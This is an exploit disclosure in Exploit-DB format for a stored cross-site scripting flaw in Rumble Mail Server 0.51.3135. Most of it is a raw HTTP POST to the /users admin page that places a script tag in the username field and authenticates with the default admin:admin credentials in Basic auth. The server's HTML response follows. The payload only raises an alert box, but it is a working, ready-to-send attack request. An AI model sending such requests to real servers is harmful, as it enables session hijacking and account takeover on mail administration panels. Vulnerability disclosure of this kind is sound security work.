# Exploit Title: Rumble Mail Server 0.51.3135 - 'username' Stored XSS # Date: 2020-9-3 # Exploit Author: Mohammed Alshehri # Vendor Homepage: http://rumble.sf.net/ # Software Link: https://sourceforge.net/projects/rumble/files/Windows%20binaries/rumble_0.51.3135-setup.exe # Version: Version 0.51.3135 # Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763 # Exploit: POST /users HTTP/1.1 Host: 127.0.0.1:2580 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 96 Origin: http://127.0.0.1:2580 Authorization: Basic YWRtaW46YWRtaW4= Connection: keep-alive Referer: http://127.0.0.1:2580/users Upgrade-Insecure-Requests: 1 username=%3Cscript%3Ealert%28%22M507%22%29%3C%2Fscript%3E&password=admin&rights=*&submit=Submit HTTP/1.1 200 OK Connection: close Content-Type: text/html
This page allows you to create, modify or delete accounts on the RumbleLua system.
Users with Full control can add, edit and delete domains as well as change server settings,
while regular users can only
see and edit the domains they have access to.
Create a new user: |
---|
Username | Rights | Actions |
---|---|---|
![]() |
Full control |
&edit=true">![]() ![]() |
![]() |
Full control |
![]() ![]() |
![]() |
Full control |
&edit=true">![]() ![]() |
Powered by Rumble Mail Server - [wiki] [project home]